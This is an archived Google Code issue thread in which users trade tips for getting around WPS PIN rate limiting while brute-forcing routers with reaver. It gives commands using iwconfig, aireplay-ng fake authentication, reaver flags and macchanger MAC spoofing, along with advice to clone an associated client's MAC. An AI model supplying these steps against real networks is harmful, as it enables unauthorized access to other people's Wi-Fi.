Open GoogleCodeExporter opened 8 years ago
unlock how via aireplay-ng ?
Original comment by kostad...@yahoo.com
on 30 Jan 2013 at 7:13
No after the lockout i was using the wireless manager to try to connect to
the ap(with a random password), when it fails it must reset the lockout so
i could carry on firing wpa pins.
Original comment by jordanc....@gmail.com
on 30 Jan 2013 at 3:52
nop, it dosn't work for me:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
over and over again
:(
Original comment by kostad...@yahoo.com
on 2 Feb 2013 at 1:23
I think I understand what you mean
I was doing (again "I think", cause I'm not sure)
the same trick using aireplay-ng.
In my case (my AP lockout after 5 false attempts for 530sec):
*1st > manualy set the channel for the mon:
# iwconfig <mon device> channel <channel #>
*2nd > use aireplay-ng for the association process and sending keep alive
packets every 60sec (add -A to reaver):
#aireplay-ng -1 60 -a <AP's BSSID> -h <mon's mac> -e <AP's ESSID>
<mon device>
*3rd >
#reaver -i <mon device> -b <AP's BSSID> -e <AP's ESSID> -c <channel
#> -N -S -A -v
Original comment by i.boud...@gmail.com
on 2 Feb 2013 at 3:01
Yeah i tried on another router and didn't work so must be only on some of
them that it works.
Original comment by jordanc....@gmail.com
on 3 Feb 2013 at 12:52
I found another way!
U should use same MAC as already associated client
Original comment by kostad...@yahoo.com
on 15 Feb 2013 at 8:55
cool does it work on all routers? how many routers have u tested it on
Original comment by jordanc....@gmail.com
on 20 Feb 2013 at 6:49
HI, and MAC how to change :)how to find it, where to see it ... regards
Original comment by m_ili...@abv.bg
on 16 Apr 2013 at 7:03
first put your wireless card off ifconfig wlan0 down then
macchanger -r wlan0 (the -r means it will make a random mac address)
then do ifconfig wlan0 up your good to go.
Original comment by jordanc....@gmail.com
on 19 Apr 2013 at 9:03
btw ifconfig will give you your mac address just look under wlan0 and
hardware
Original comment by jordanc....@gmail.com
on 19 Apr 2013 at 9:05
Original issue reported on code.google.com by
jordanc....@gmail.com
on 29 Jan 2013 at 9:28